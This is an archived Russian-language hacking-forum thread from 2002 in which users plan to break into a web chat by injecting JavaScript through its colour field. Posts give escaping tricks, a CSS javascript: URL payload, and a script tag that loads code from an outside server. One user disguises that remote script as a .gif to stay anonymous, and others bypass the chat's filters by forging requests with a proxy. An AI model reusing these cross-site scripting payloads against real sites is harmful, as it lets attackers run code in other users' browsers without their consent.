ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.06.2002, 02:59
|
|
Познающий
Регистрация: 27.05.2002
Сообщений: 80
Провел на форуме:
0
Репутация:
28
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 05 2002,17:16)</td></tr><tr><td id="QUOTE">Предыдущее общение можно стереть (я дурак)...
Вопросик, хочу написать скарипт посложнее...
Вот такой вот работает (через цвет):
цвет="background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))""
В чате он превращается в
color:;background-image:url(javascript:document.write(unescape(& #39;%3C&#39;)+&#39;script&#39;+unescap e(&#39;%3E&#39;)+&#39;alert()&#39; +&#39;;&#39;+&#39;alert()&#39;+une scape(&#39;%3C&#39;)+&#39;/script&#39;+unescape(&#39;%3E&#39;) ));
Но все равно работает. Но вот когда я забиваю внутрь alert
что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &#39) и скрипт не испольняется. Как быть не подскажите?[/QUOTE]<span id='postcolor'>
можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????
|
|
|
06.06.2002, 12:19
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (mifan @ июня 06 2002,02:54)</td></tr><tr><td id="QUOTE">странно а пачиму у меня не пашет с ', а только с ", может руки кривые  ?[/QUOTE]<span id='postcolor'>
Нужно писать не ' а ` |
|
|
|
06.06.2002, 12:43
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (mifan @ июня 06 2002,02:59)</td></tr><tr><td id="QUOTE">можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????[/QUOTE]<span id='postcolor'>
По моему там пропускается больше символов.
Но в принципе, если поле обрезает длинну скрипта, то все равно можно вставить скрипт неограниченной длинны.
Например вставив такой скрипт: document.write('< script src="http://myServer/a.js"></script>')
А в файл a.js можно засунуть скрипт любой длинны.
Тут еще могу сказать следующее: если тег требует закрывающего, например < script></script>, то такую запись можно сократить до такого вида < script/>. Эти два вида записи эквивалентны, но вторая существенно короче.
Таким образов первый пример можно еще сократить до такого:
document.write('< script src="http://myServer/a.js"/>') |
|
|
|
06.06.2002, 13:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Насчет .js я только хотел написать... а ты меня опередил. До этого я и сам додумался! Гы-гы-гы. Сейчас разрабатываю соотв код. Вот только одна загвоздка - как бы вместо фоток (в профиле пользователя). Точнее в тот же каталог сунуть *.js . Может это просто? Это желательно что бы не подгружать *.js из другого сайта (что бы не было подозрительно). Вот было бы здорово! К сожаление js вместо jpg подсунуть не получается - скрипты закачки сами размер меняют... и портят. Зато #60;script src=" http://www.xnjnj.ru/kill.js"> можно поменять на
#60;script src=" http://www.xnjnj.ru/smile.gif"> (и переименовать соотв js на сайте-базе). Работать будет (это я для пущей анаонимности). Algol, а как ты сохранил фрейм? Я так и не понял. Использую Proxomitron (firewall оригинальный), который "на лету" меняет html-ки. Вот так вот обошел необходимость менять вид фрейма (для подстановки цветов). |
|
|
|
06.06.2002, 14:02
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,13:57)</td></tr><tr><td id="QUOTE">Algol, а как ты сохранил фрейм?[/QUOTE]<span id='postcolor'>
Еще раз говорю: я не сохраняю фреймы, я подделываю HTTP запросы
|
|
|
|
06.06.2002, 15:41
|
|
Познающий
Регистрация: 27.05.2002
Сообщений: 80
Провел на форуме:
0
Репутация:
28
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Нужно писать не ' а ` [/QUOTE]<span id='postcolor'>
я делал через копипейст, ошибиться не мог
|
|
|
|
06.06.2002, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
"Я подделываю http-запросы". Понял..
Оказывается Proxomitron похоже умеет тоже самое делать... попробую. В принципе тут видимо нужно перехватывать метод POST и все...
|
|
|
|
06.06.2002, 19:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??
|
|
|
|
07.06.2002, 11:30
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ...
Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...
|
|
|
|
07.06.2002, 17:24
|
|
Новичок
Регистрация: 03.06.2002
Сообщений: 11
Провел на форуме:
0
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (Algol @ июня 07 2002,11:30)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ...
Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...[/QUOTE]<span id='postcolor'>
Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.! |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
